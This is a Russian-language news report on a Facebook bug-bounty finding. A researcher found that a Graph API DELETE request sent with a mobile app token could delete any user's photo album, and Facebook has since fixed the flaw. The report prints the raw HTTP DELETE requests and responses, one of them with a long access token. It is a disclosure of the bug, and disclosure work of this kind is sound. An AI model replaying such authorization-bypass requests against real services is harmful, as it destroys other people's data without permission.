Facebook быстро закрыл уязвимость с удалением чужих фотоальбомов. Несмотря на простоту в реализации, компания выплатила автору баг-репорта Лаксману Мутьяху (Laxman Muthiyah) вознаграждение $12500.

Довольный автор рассказал в блоге, как он нашёл баг.

Парень экспериментировал с запросами через Graph API — программный интерфейс, через который приложения Facebook считывают и записывают информацию. У него было своё приложение и токен, с которыми он экспериментировал, пытаясь удалить свой собственный фотоальбом простым запросом DELETE.

Request :-
DELETE /518171421550249 HTTP/1.1
Host :  graph.facebook.com 
Content-Length: 245
access_token=CAACEdEose0cBAABAXPPuULhNCsYZA2cgSbajNEV99ZCHXoNPvp6LqgHmTNYvuNt3e5DD4wZA1eAMflPMCAGKVlaDbJQXPZAWqd3vkaAy9VvQnxyECVD0DYOpWm3we0X3lp6ZB0hlaSDSkbcilmKYLAzQ6ql1ChyViTiSH1ZBvrjZAH3RQoova87KKsGJT3adTVZBaDSIZAYxRzCNtAC0SZCMzKAyCfXXy4RMUZD

Response :-
{"error":{"message":"(#200) Application does not have the capability to make this API call.","type":"OAuthException","code":200}}

С помощью обычного токена это сделать не удалось, зато получилось с помощью мобильного токена.

Request :-
DELETE /518171421550249 HTTP/1.1
Host :  graph.facebook.com 
Content-Length: 245
access_token=

Response :-
true

К удивлению автора, аналогичный запрос сработал и на удаление чужого фотоальбома. И вообще, на удаление любого фотоальбома на сайте Facebook.

За час своей работы автор получил заслуженный гонорар.

Facebook быстро закрыл баг, добавив четыре строчки кода, не считая скобок.

Прочитать полностью на сайте: Facebook исправил баг с удалением чужих фотоальбомов